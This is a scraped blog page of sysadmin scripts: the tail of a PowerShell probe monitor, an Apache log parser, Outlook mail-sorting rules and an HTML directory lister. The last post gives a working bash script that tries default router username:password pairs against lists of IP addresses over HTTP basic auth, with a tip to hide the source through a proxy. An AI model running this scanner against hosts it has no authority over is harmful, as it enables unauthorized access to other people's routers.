                if ( $faultyPr[$a][1] -lt $profileProbes[$i][$j][$k][1] )
                {
                  $faultyPr[$a][1] = $profileProbes[$i][$j][$k][1]
                  $faultyPr[$a][2] = $profiles[$i][$j][0]
                }
              }
            }
          }
          if ( $containCheck -eq 0 )
          {
            $probe = New-Object object[] 3
            $probe[0] = $profileProbes[$i][$j][$k][0]
            $probe[1] = $profileProbes[$i][$j][$k][1]
            $probe[2] = $profiles[$i][$j][0]
            $faultyPr[$faultyPrIndex] = $probe
            $faultyPrIndex++;
          }
        }
      }
    }
  }
  if ($progress -eq "-") {Write-host -nonewline "`b\" ; $progress = "\"; continue}
  if ($progress -eq "\") {Write-host -nonewline "`b|"; $progress = "|";continue}
  if ($progress -eq "|") {Write-host -nonewline "`b/"; $progress = "/";continue}
  if ($progress -eq "/") {Write-host -nonewline "`b-"; $progress = "-";continue}
}
 
if ($strict -eq 1) 
{
  for ( $a = 0; $a -lt $faultyPr.Length; $a++ )
  {
    if ($faultyPr[$a])
    {
    for ($i = 0; $i -lt $profileProbes.Length; $i++)
     {
     for ($j = 0; $j -lt $profileProbes[$i].Length; $j++)
      {
      for ($k = 0; $k -lt $profileProbes[$i][$j].Length; $k++)
      {
        if ( ($profileProbes[$i][$j][$k]) -and ($faultyPr[$a]) )
        {
         if ( $faultyPr[$a][0] -eq $profileProbes[$i][$j][$k][0] )
         {
          if ( $faultyPr[$a][1] -lt $profileProbes[$i][$j][$k][1] )
         {
          $diff = $now - [int][double]::Parse(($profileProbes[$i][$j][$k][1]))
          $diff = $diff / 60 / 60;
          $diff = [int]$diff;
          if ( $diff -lt 25)
          {
            $faultyPr[$a] = $null;
          }
          else
          {
            $faultyPr[$a][1] = $profileProbes[$i][$j][$k][1];
            $faultyPr[$a][2] = $profiles[$i][$j][0];
          }
         }
         }
        }
      }
     }
     }
    }
  }
}
 
Write-host -foregroundcolor green "`b`b`tV"

# PRINTING INFO
Write-host -foregroundcolor green "`n PROFILES MISSING DATA: ";
  showFaultyProfiles;

Write-host -foregroundcolor green "`n UNRESPONSIVE TRANSACTIONS: ";
  showFaultyTransactions;

Write-host -foregroundcolor green "`n INACTIVE PROBES: ";
  drawHeader;

# SORTING TABLE
$faultyPr = $faultyPr | sort-object @{Expression={$_[1]}; Ascending=$true}
 
# PRINTING INACTIVE PROBES
for ( $i = 0; $i -lt $faultyPr.Length; $i++ )
{
  if ($faultyPr[$i])
  {
   $whatIWant = $origin.AddSeconds($faultyPr[$i][1]);
   $size = 21;
   $dateString = [string]$whatIWant
   $spaces = [int]([int]$size - [int]$dateString.Length)
   for ($j = 0; $j -lt $spaces; $j++)
   {
     $dateString = $dateString + " ";
   }
  
   $diff = $now - [int][double]::Parse(($faultyPr[$i][1]))
   $diff = $diff / 60 / 60;
   $diff = [int]$diff;
   $size = 12;
   $diffString = [string]$diff
   $spaces = [int]([int]$size - [int]$diffString.Length)
   for ($j = 1; $j -lt $spaces; $j++)
   {
     $diffString = " " + $diffString;
   }

   $size = 25;
   $probeString = [string]$faultyPr[$i][0]
   $spaces = [int]([int]$size - [int]$probeString.Length)
   for ($j = 1; $j -lt $spaces; $j++)
   {
     $probeString = " " + $probeString;
   }
   $size = 45;
   $transactionString = [string]$faultyPr[$i][2]
   $spaces = [int]([int]$size - [int]$transactionString.Length)
   for ($j = 1; $j -lt $spaces; $j++)
   {
     $transactionString = " " + $transactionString;
   }
    # COLOR BY AGE: >60 DAYS MAGENTA, >30 DAYS RED, >7 DAYS YELLOW, ELSE GREEN
    if ( $diff -gt 1440 )
   {
     printRow ($dateString) ($diffString) ($probeString) ($transactionString) ("Magenta")
   }
   elseif ( $diff -gt 720 )
   {
     printRow ($dateString) ($diffString) ($probeString) ($transactionString) ("Red")
   }
   elseif ( $diff -gt 168 )
   {
     printRow ($dateString) ($diffString) ($probeString) ($transactionString) ("Yellow")
   }
   else 
   {
     printRow ($dateString) ($diffString) ($probeString) ($transactionString) ("Green")
   }
    drawLine;
 }
}
####################

Saturday, April 6, 2013

simple apache access log parser [with reverse DNS check and colors]

Entry moved here: http://wondershell.wordpress.com/2014/04/09/apache-access-log-parser/

Nothing special here really. Just a few lines of code to make log review a little bit easier.

Displayed columns in order from left to right:

  1. Date and time of access
  2. HTTP code of the response [200 in green, 404 in blue, the rest in red]
  3. IP address
  4. Reverse DNS hostname [last 30 chars] [empty if NXDOMAIN]
  5. Request [first 30 chars]
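The cut pipelines used in the script below can be sanity-checked against a single combined-log line (the sample line here is made up):

```shell
# A made-up sample access log line:
line='93.184.216.34 - - [06/Apr/2013:12:34:56 +0200] "GET /index.html HTTP/1.1" 200 1234'

# Same field extraction as in the script:
ip=$(echo "$line" | cut -d " " -f 1)
date=$(echo "$line" | cut -d "[" -f 2 | cut -d "]" -f 1 | cut -d "+" -f 1)
req=$(echo "$line" | cut -d "]" -f 2 | cut -d "\"" -f 2 | cut -d " " -f -2)
code=$(echo "$line" | cut -d "\"" -f 3 | cut -d " " -f 2)

echo "$ip | $code | $req"   # 93.184.216.34 | 200 | GET /index.html
```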


The output:



Script:


#!/bin/bash

while read line
do
        # IP
          ip=$(echo $line | cut -d " " -f 1)

        # HOST
          host=$(host $ip | cut -d " " -f 5 | tail -1)
          if [[ ${#ip} -lt 15 ]]; then
                for (( i=15-${#ip}; i>0; i-- )); do
                        ip="$ip "
                done
          fi

        # IF I DO NOT GET DOMAIN NAME
          if [[ $(echo "$host" | grep "NXDOMAIN" | wc -l ) -ne 0 ]]; then
                host=" - "
          fi

        # EVEN UP THE HOSTNAME TO SEE LAST 30 CHARS
          if [[ ${#host} -lt 30 ]]; then
                for (( i=30-${#host}; i>0; i-- )); do
                        host="$host "
                done
          else
                host=${host:${#host}-30}
          fi

          dhost="\033[01;30m$host\033[00m"

        #   DISPLAY GOOGLEBOT CUSTOM DNS               
          if [[ $(echo $host | grep google |wc -l) -eq 1 ]]; then
                dhost="\033[01;30mGOOGLEBOT\033[00m                     "
          fi

        # DATE
          date=$(echo $line | cut -d "[" -f 2 | cut -d "]" -f 1 | cut -d "+" -f 1)
                day=$(echo $date | cut -d ":" -f 1 | tr -d " ")
                dtime=$(echo $date | cut -d ":" -f 2- | tr -d " ")

        # REQUEST
          req=$(echo $line | cut -d "]" -f 2 | cut -d "\"" -f 2 | cut -d " " -f -2)
        # CUT REQUEST TO 30 CHARS
          dreq=${req:0:30}
        # CUSTOM REQUEST INFO IN CASE OF ADMIN PANEL
          if [[ $(echo $req | grep "admin.php" | wc -l) -eq 1 ]]; then
                dreq="\033[01;31mFAV\033[00m"
          fi

        # HTTP CODE
          code=$(echo $line | cut -d "\"" -f 3 | cut -d " " -f 2)
          hcode="\033[01;31m$code\033[00m";
          if [[ "$code" == "200" ]]; then
                hcode="\033[01;32m$code\033[00m";
          fi
          if [[ "$code" == "404" ]]; then
                hcode="\033[01;34m$code\033[00m";
          fi


        # DISPLAY
          # I DONT WANT TO DISPLAY FAVICON REQUESTS
          if [[ $(echo $req | grep "favicon.ico" | wc -l) -eq 1 ]]; then
                echo -n ""
          else
                echo -e "$day $dtime $hcode $ip $dhost $dreq"
          fi
done < /var/log/apache2/access.log

Monday, March 11, 2013

outlook rules (moving emails) with powershell - upgraded version

Entry moved here: http://wondershell.wordpress.com/2014/04/09/outlook-rules-with-powershell-script-moving-emails-to-pst-file/

I've modified the previous script a bit, so that the code is easier to understand and modify.

This version is based on the display function:

function display( [string]$subject, [string]$color )  {
  # PAD THE SUBJECT WITH SPACES UP TO 20 CHARS, PRINT THE FIRST 20 UPPERCASED
  $len = 20
  if ( $subject.length -lt 20 ){
    $toadd=20-$subject.length;
    for ( $i=0; $i -lt $toadd; $i++ )
    {
      $subject=$subject+" ";
    }
    $len = $subject.length
  }
  else { $len = 20 }

  $index=$index+1
  Write-host -ForegroundColor $color -nonewline " |" ((($subject).ToString()).Substring(0,$len)).ToUpper() 
}


It takes two parameters:
     subject - the email subject
     color   - the color used to display that particular email subject
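The padding done by display (right-pad with spaces to 20 characters, truncate to 20, uppercase) is equivalent to a single printf format; here is a quick shell illustration of the same idea (hypothetical, not part of the script):

```shell
# Hypothetical one-line equivalent of display's padding/truncation:
# '%-20.20s' left-justifies, pads to 20 chars and truncates at 20.
display_equiv() {
  printf '%-20.20s' "$1" | tr '[:lower:]' '[:upper:]'
}

display_equiv "Nagios Critical Alert"   # prints "NAGIOS CRITICAL ALER" (20 chars)
```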

Here is how it looks now (sorry for the cuts and blurs - had to do it):



SCRIPT:
# VARIABLES #

 # CREATE OUTLOOK INSTANCE
        $outlook = New-Object -comobject outlook.application
        $namespace = $outlook.GetNameSpace("MAPI")

 # PATH TO PST FILE
        $pstPath = "D:\PST\ALERT.pst"

 # ACCESS THE PST FILE AND MAP DESIRED FOLDERS
        $pst = $namespace.Stores | ?{$_.FilePath -eq $pstPath}
        $pstRoot = $pst.GetRootFolder()
        $pstFolders = $pstRoot.Folders
        $nagiosFolder = $pstFolders.Item("NAGIOS")

 # DEFAULT FOLDER 6 IS INBOX, 3 IS DELETED ITEMS
        $DefaultFolder = $namespace.GetDefaultFolder(6)
        $InboxFolders = $DefaultFolder.Folders
        $DeletedItems = $namespace.GetDefaultFolder(3)

        $Emails = $DefaultFolder.Items

# BALLOON FUNCTION

function balloon([string]$text, [string]$title)
{
    if ($objBalloon)
    {
      # DELETE EXISTING BALLOON
      $objBalloon.Dispose()
    }

    [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
    $objBalloon = New-Object System.Windows.Forms.NotifyIcon
    $objBalloon.Icon = "C:\Windows\ServicePackFiles\i386\msnms.ico"

     # INFO, WARNING AND ERROR VALUES ARE ALLOWED
      $objBalloon.BalloonTipIcon = "Error"
      $objBalloon.BalloonTipTitle = "$title"
      $objBalloon.BalloonTipText = "$text"
      $objBalloon.Visible = $True

     # HOW LONG TO SHOW THE BALLOON
      $objBalloon.ShowBalloonTip(5000)
}

# DISPLAY FUNCTION

function display( [string]$subject, [string]$color )  {
  $len = 20
  if ( $subject.length -lt 20 )
  {
    $toadd=20-$subject.length;
    for ( $i=0; $i -lt $toadd; $i++ ){
      $subject=$subject+" ";
    }
    $len = $subject.length
  }
  else { $len = 20 }
  $index=$index+1
  Write-host -ForegroundColor $color -nonewline " |" ((($subject).ToString()).Substring(0,$len)).ToUpper() 
}


# PROCESSING EMAILS

foreach ($Email in $Emails) {
  $index=$index+1
        # FOUR SUBJECTS PER LINE
  if ( ($index % 4) -eq 0 ) {  Write-host -nonewline -ForegroundColor DarkGray " |`n" }

  if ($Email.To -eq "Surname, Name" -and $Email.Subject -notmatch "SPAM") {
      $Email.Move($nagiosFolder) | out-null
      display  ([string]$Email.Subject ) ([string]"Cyan")
      continue
  }
  if ($Email.Subject -match "SiteScope Alert, error") {
      $Email.Move($pstFolders.Item("SITESCOPE")) | out-null
      display  ([string]$Email.Subject ) ([string]"Yellow")
      continue
  }
    # DEFAULT BEHAVIOR IF NO MATCH IN RULES ABOVE
    display  ([string]$Email.Subject ) ([string]"DarkGray")
}


Friday, January 25, 2013

directory list to html with powershell

Entry moved here: http://wondershell.wordpress.com/2014/04/09/generating-html-file-from-directory-list/

There was a day when I was searching for some files inside a directory with multiple subdirectories. Of course there is a Windows search tool that can help you to some extent, but it will not let you view multiple directories at the same time while highlighting files of a particular kind - and that is what I wanted.
Below is a PowerShell script that does exactly that: it lists the directory content and creates an HTML file that lets you see and (in some cases) easily open the files.

Each file is displayed as a tile like this one:
On each tile there is the filename, the file size and the date of last modification.

And the web page generated will look like this:

Tiles are grouped as they appear in directories. They have different colors based on their extensions. In my case the black ones are txt files, the yellow ones are html/htm files, the violet ones are PDFs, and pictures of common types are purple. The rest are displayed as gray.
The files with colors other than gray can be opened in the browser by clicking on a tile. Most browsers do not support opening files like docx just by clicking a URL pointing at the file, because the browser does not know a protocol that could handle such a file. Thankfully, you can register your own protocol handler, but I will show that some other time.
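The extension-to-color mapping can be summarized in a compact sketch (shell notation used here just for illustration; the actual mapping lives in the PowerShell elseif chain in the script):

```shell
# Illustrative sketch of the tile color mapping (not part of the script):
color_for_ext() {
  case "${1##*.}" in
    txt|cpp|c|h|hpp)            echo black  ;;  # text/source files
    html|htm)                   echo yellow ;;
    pdf)                        echo violet ;;
    jpg|jpeg|gif|png|bmp|tiff)  echo purple ;;  # common picture types
    *)                          echo gray   ;;  # everything else, not clickable
  esac
}

color_for_ext report.pdf   # violet
```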

For now you can open txt, cpp, c, hpp, h, gif, tiff, jpg, jpeg, png, bmp, pdf, html and htm files from the web page generated by the script.
File size is displayed in bytes, kilobytes or megabytes - if the size is bigger than 1024 bytes it will be shown in kilobytes.
You can easily modify the script to add your own coloring preferences just by creating or altering a CSS style.
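The size formatting can be sketched as a small shell helper (a hypothetical stand-alone equivalent of the PowerShell logic in the script, not part of it):

```shell
# Hypothetical shell equivalent of the script's size formatting:
# > 1 MB shown in MB, > 1 KB shown in KB, otherwise plain bytes.
human_size() {
  local bytes=$1
  if [ "$bytes" -gt 1048576 ]; then
    awk -v b="$bytes" 'BEGIN { printf "%.2f MB", b / 1048576 }'
  elif [ "$bytes" -gt 1024 ]; then
    awk -v b="$bytes" 'BEGIN { printf "%.2f KB", b / 1024 }'
  else
    printf '%d B' "$bytes"
  fi
}

human_size 512      # 512 B
echo
human_size 2048     # 2.00 KB
```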

The script:


$global:current_dir="";
$global:open=0;
$root=($(pwd).Path).Length;

$out = "
<html>
  <head>
  <style>
    body {
      padding: 0px;
      margin: 0px;
      background-color: rgb(30,30,30);
      background-image: -ms-linear-gradient(top left, #3F0F63 0%, #930AEF 100%);
      background-image: -moz-linear-gradient(top left, #3F0F63 0%, #930AEF 100%);
      background-image: -o-linear-gradient(top left, #3F0F63 0%, #930AEF 100%);
      background-image: -webkit-gradient(linear, left top, right bottom, color-stop(0, #3F0F63), color-stop(1, #930AEF));
      background-image: -webkit-linear-gradient(top left, #3F0F63 0%, #930AEF 100%);
      background-image: linear-gradient(to bottom right, #3F0F63 0%, #930AEF 100%);
    }
    div.directory {
      border: 2px solid rgb(155,155,155);
      border-bottom: 0px;
      padding: 5px;
      overflow:auto; 
    }
    div.dirtitle {
      font-family: Verdana;
      font-size: 11px;
      color: rgb(140,140,140);
      text-align:left;
      padding: 3px;
      margin: 3px;
      width: 95%;
    } 
    div.file {
      border: 2px solid rgb(30,30,30);
      width: 80px;
      height: 80px;
      float: left;
      position: relative;
      padding: 3px;
      text-align:center;
      color: white;
    }
    span.filename {
      font-family: Verdana;
      font-size: 12px;
      line-height: 40px;
    }
    span.filesize {
      font-family: Verdana;
      font-size: 10px;
    }
    span.mod_date {
      font-family: Verdana;
      font-size: 10px;
    }
    .word {
      background-color: rgb(82,82,82);
    }
    div.file:hover {
        border: 2px solid rgb(72,72,72);
    }
    .orange {
      background-color: rgb(218, 83, 44);
    }
    .green {
      background-color: rgb(0, 163, 0);
    }
    .purple {
      background-color: rgb(185, 29, 71);
    }
    .blue {
      background-color: rgb(45, 137, 239);
    }
    .yellow {
        background-color: rgb(255, 196, 13);
    }
    .violet {
      background-color: rgb(159, 0, 167);
    }
    .black {
      color: white;
      background-color: rgb(0, 0, 0);
    }
    .gray {
      background-color: rgb(100, 100, 100);
    }
    .red {
      background-color: rgb(224, 25, 61);
    } 
  </style> 
</head>
<body>";


Write-Output $out >> test.html ;

Get-ChildItem -recurse | where { $_.PSIsContainer -eq $false } |% { 
 # NO TILES FOR DIRECTORIES
 if ( [string]$global:current_dir -ne [string]$_.Directory ){
  if ( $global:open -eq 0 ) 
  {
   $global:open=1;
   $out= "<div id='directory' class='directory'> <div id='dirtitle' class='dirtitle'>" + $_.Directory + "</div>";
   Write-Output $out >> test.html ;
  }
  else 
  {
   $out = " </div><div id='directory' class='directory'> <div id='dirtitle' class='dirtitle'>" + $_.Directory + "</div> ";
   Write-Output $out >> test.html;
  }
  $global:current_dir=$_.Directory;
 }
 
 # CORRECTING PATH
 $relPath = $_.FullName.Remove(0, $root + 1)
 $relPath = $relPath -replace "\\", "/"
 
 # HTML
 if ( $_.Extension -eq ".html" -or $_.Extension -eq ".htm")
 {
  $out= "<div class='file yellow' onclick='window.location=`"" + ($relPath).trim() + "`"'>";
  Write-Output $out >> test.html ; 
 }
 # TEXT FILES
 elseif ( $_.Extension -eq ".txt" -or $_.Extension -eq ".cpp" -or $_.Extension -eq ".c" -or $_.Extension -eq ".h" -or $_.Extension -eq ".hpp") 
 {
  $out= "<div class='file black' onclick='window.location=`"" + $relPath + "`"'>";
  Write-Output $out >> test.html ;
 }
 # PDF
 elseif ( $_.Extension -eq ".pdf" ) 
 {
  $out= "<div class='file violet' onclick='window.location=`"" + $relPath + "`"'>";
  Write-Output $out >> test.html ;
 }
 # PICTURES
 elseif ( $_.Extension -eq ".jpg" -or $_.Extension -eq ".gif" -or $_.Extension -eq ".png" -or $_.Extension -eq ".jpeg" -or $_.Extension -eq ".bmp" -or $_.Extension -eq ".tiff" ) 
 {
  $out= "<div class='file purple' onclick='window.location=`"" + $relPath + "`"'>";
  Write-Output $out >> test.html ;
 }
 else 
 { 
  $out = "<div class='file gray' >";
  Write-Output $out >> test.html 
 }
 
 # REMOVING HYPHEN FROM FILENAMES
 # SINCE IT CAUSES MULTIPLE LINES 
 # TO BE GENERATED PER FILENAME
 $sanit= $_.BaseName -replace "-", "_"

 # SHOWS ONLY FIRST 9 CHARACTERS FROM FILE NAME
 # TO AVOID OVERFLOW
 if ( ($sanit).Length -gt 9 )
 {
  $out= "`t<span id='filename' class='filename'>" + ($sanit).Substring(0,9) + "</span><br> ";
 }
 else 
 {
  $out= "`t<span id='filename' class='filename'>" + $sanit + "</span><br> ";
 }
 Write-Output $out >> test.html;

 $var=$_.Length;

 # SIZE BIGGER THAN MB
 if ( $var -gt 1048576 )
 {
  $var=$var/1048576;
  $var = "{0:N2}" -f $var
  $out = "`t<span id='filesize' class='filesize'>" + ([string]$var).trim() + " MB</span><br>";
  Write-Output $out >> test.html;
 }
 else 
 {
  # SIZE BIGGER THAN KB
  if ( $var -gt 1024 )
  {
   $var=$var/1024;
   $var = "{0:N2}" -f $var
   $out = "`t<span id='filesize' class='filesize'>" + ([string]$var).trim() + " KB</span><br>";
   Write-Output $out >> test.html;
  }
  else 
  {
   $out = "`t<span id='filesize' class='filesize'>" + ([string]$var).trim() + " B</span><br>";
   Write-Output $out >> test.html;
  }
 }
 $out = "`t<span id='mod_date' class='mod_date'>" + $_.LastWriteTime + "</span><br>"
 Write-Output $out >> test.html ;
 Write-Output "</div>" >> test.html;
 Write-Output "`n" >> test.html;
}
Write-Output "</div></body></html>" >> test.html;

Tuesday, January 22, 2013

outlook rules with powershell [without 32 KB storage limit]

Entry moved here: http://wondershell.wordpress.com/2014/04/09/outlook-rules-with-powershell-script-moving-emails-to-pst-file/


Have you ever reached the size limit of the rules that you can set up in Microsoft Outlook? Well, I did. By default it is 32 KB, which can be extended to 256 KB. Still, if you receive a couple of hundred emails per day - like myself - maybe you will appreciate the fact that you don't have to be limited to those thresholds. There is a fairly simple solution and its name is PowerShell.
Below you will find a PowerShell script with a couple of example rules and a bonus function for displaying balloon tooltips. It is designed to work with a PST file, but if you have a large mailbox quota you don't have to move emails outside of your Exchange mailbox.

This is how it will look like in console:

Here is how balloon tooltip will look like:

If you do not want to manually start the script, you can use a scheduled task and a batch file similar to this one:

  @ECHO OFF
  TITLE "RULES"
  COLOR 0A
  CLS
  MODE CON COLS=30 LINES=10
  CD "D:\"
  powershell.exe .\RULES.ps1 >> rules.log

Or, if you do not want to see anything at all, you can use a VBScript like this one:

  Dim shell, command
  command = "powershell.exe -nologo D:\RULES.ps1"
  Set shell = CreateObject("WScript.Shell")
  shell.Run command,0

Additionally, you can create a hyperlink to one of those files (batch or VBScript) and associate it with a button in the Outlook GUI:


Script:

# VARIABLES #

 # CREATE OUTLOOK INSTANCE
        $outlook = New-Object -comobject outlook.application
        $namespace = $outlook.GetNameSpace("MAPI")

 # PATH TO PST FILE
        $pstPath = "D:\PST\ALERT.pst"

 # ACCESS THE PST FILE AND MAP DESIRED FOLDERS
        $pst = $namespace.Stores | ?{$_.FilePath -eq $pstPath}
        $pstRoot = $pst.GetRootFolder()
        $pstFolders = $pstRoot.Folders
        $nagiosFolder = $pstFolders.Item("NAGIOS")

 # DEFAULT FOLDER 6 IS INBOX, 3 IS DELETED ITEMS
        $DefaultFolder = $namespace.GetDefaultFolder(6)
        $InboxFolders = $DefaultFolder.Folders
        $DeletedItems = $namespace.GetDefaultFolder(3)

        $Emails = $DefaultFolder.Items

# BALLOON FUNCTION

function balloon([string]$text, [string]$title)
{
        if ($objBalloon)
        {
         # delete existing balloon #
                $objBalloon.Dispose()
        }

                [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
                $objBalloon = New-Object System.Windows.Forms.NotifyIcon
                $objBalloon.Icon = "C:\Windows\ServicePackFiles\i386\msnms.ico"

         # Info, Warning and Error values are allowed
                $objBalloon.BalloonTipIcon = "Error"

         # Put what you want to say here for the Start of the process
                $objBalloon.BalloonTipTitle = "$title"
                $objBalloon.BalloonTipText = "$text"
                $objBalloon.Visible = $True

         # How long should the balloon be visible
                $objBalloon.ShowBalloonTip(5000)
}

# PROCESSING EMAILS

Foreach ($Email in $Emails)
{
        # UNCOMMENT NEXT LINE IF YOU WANT TO SEE
        # ALL EMAILS THAT ARE BEING REVIEWED
        # Write-host " " $Email.SentOn " :`t" $Email.Subject

        # MOVING TO NAGIOS FOLDER # MATCHING BY SUBJECT

        IF ($Email.Subject -match "Nagios Critical Alert")
        {
                $Email.Move($nagiosFolder) | out-null
                Write-host -ForegroundColor Green " " $Email.SentOn " :`t" $Email.Subject

                # DISPLAY BALLON
                balloon ([string]$Email.Subject) ([string]$Email.SentOn)
        }
        IF ($Email.Subject -match "Nagios Alert" -or $Email.Subject -match "Nagios Warning" )
        {
                $Email.Move($nagiosFolder) | out-null
                Write-host -ForegroundColor Green " " $Email.SentOn " :`t" $Email.Subject
        }

        # MOVING TO DELETED ITEMS # MATCHING BY SENDER

        IF ($Email.SenderEmailAddress -match "/O=CORPORATE/OU=GROUP/CN=RECIPIENTS/CN=SOME")
        {
                # MARKING AS UNREAD (TO SEE HOW MANY ITEMS HAVE BEEN DELETED)
                $Email.UnRead = $True

                # MOVE
                $Email.Move($DeletedItems) | out-null
                Write-host -ForegroundColor Red " " $Email.SentOn " :`t" $Email.Subject
        }
        IF ($Email.SenderEmailAddress -match "spammer@ads.com")
        {
                $Email.Move($DeletedItems) | out-null
                Write-host -ForegroundColor Red " " $Email.SentOn " :`t" $Email.Subject
        }
}

find routers with default password


Entry moved here: http://wondershell.wordpress.com/2014/04/09/find-routers-with-default-password/

Another day, another script...

This script assumes you have a list of IP addresses stored in one file and a list of username:password pairs in another. There are some variables within the script which allow you to limit the search to hosts that respond to ICMP echo requests, or to display only those IPs that responded to ping. It is designed this way because some hosts might not respond to ICMP echo requests and still have port 80 open.

Example content of username:password file:

  admin:admin
  admin:password
  admin:
  ADSL:expert03
  ZXDSL:ZXDSL
  admin:administrator
  admin:comcast
  admin:1234

Here is script output produced when displaying all IPs and their statuses:



..and the other output displaying only 'Alive' ones:




  ALIVE means the host responded to ping.
  200 means the HTTP server response on port 80 was HTTP/1.* 200 OK.
  401 means the HTTP server requested authorization - this is what we are looking for.

    Vertical bars after the 401 status indicate username:password pairs used to
    authenticate. If a correct pair is found - it is displayed after PASS.
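The status classification boils down to matching the first response line; here is a small standalone sketch (same substring matches as the script's greps, wrapped in a function purely for illustration):

```shell
# Illustrative classifier for the first HTTP response header line:
classify_header() {
  case "$1" in
    *" 401"*) echo 401 ;;   # authorization requested - worth trying passwords
    *" 200"*) echo 200 ;;   # plain web server, nothing to authenticate
    *)        echo other ;;
  esac
}

classify_header "HTTP/1.1 401 Unauthorized"   # 401
```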

Finally, the script itself:
#!/bin/bash

#=================#
#    VARIABLES    #
#=================#

  ips=`cat ip.list`
  users=`cat users.list`
  PING_CHECK=0
  DISPLAY_DEAD=1

# FOR ALL IP ADDRESSES IN THE FILE

for ip in $ips; do

  # IF  YOU WANT TO LIMIT THE CHECK TO ONLY 
  # REACHABLE BY ICMP SET PING_CHECK VARIABLE

  if [[ $PING_CHECK -eq 1 ]];then
    connection=`ping -W 1 -c 1 $ip | grep "1 packets" | grep -v "errors" | cut -d " " -f 6 | cut -b 1`
  else
    connection=0
  fi

  if [[ $connection -eq 0 ]]; then
    if [[ $PING_CHECK -eq 1 ]]; then

      # ALIVE MEANS REACHABLE BY PING

      echo -ne "\n $ip\t\033[1;32mALIVE\033[0m "; 
    else
      echo -ne "\n $ip\t";
    fi

    flag=0
    while [[ $flag -eq 0 ]]; do

    # SET THE CURL TO USE PROXY WITH -x PARAMETER 
    # OR RUN SCRIPT VIA PROXYCHAIN

      header=`curl --connect-timeout 3 -I -s $ip --location | head -1`
      web=`echo $header | grep " 200" | wc -w`
      auth=`echo $header | grep "HTTP/1.1 401" | wc -w`

      if [[ $web -gt 1 ]]; then
        
        # HTTP/1.* 200 OK - WEB SERVER FOUND

        echo -ne "\t \033[37m-> 200\033[0m " 
      fi

      if [[ $auth -gt 1 ]]; then

        # HTTP/1.* 401 AUTHORIZATION REQUIRED

        echo -ne "\t \033[37m-> 401\033[0m " 


        # TRY AUTHENTICATE WITH COMMON USERNAMES 
        # AND PASSWORDS FROM $users FILE

        for user in $users; do
          passcheck=`curl --connect-timeout 3 -I -s -u $user $ip --location | head -1 | grep "HTTP/1.1 401" | wc -w`
          if [[ $passcheck -lt 1 && $flag -eq 0 ]]; then
            

            # DISPLAY PASSWORD IF FOUND

            echo -ne "\t\033[32mPASS: $user\033[0m"; 

            flag=1
            break;
          else
            echo -ne "\033[37m|\033[0m";
          fi
        done
      fi
      flag=1
    done
  else
    # IF YOU WANT TO SEE ALL IP ADDRESSES THAT ARE BEING CHECKED
    # SET $DISPLAY_DEAD
    if [[ $DISPLAY_DEAD -eq 1 ]]; then
      echo -ne "\n $ip\t\033[31mDEAD\033[0m ";
    fi
  fi
done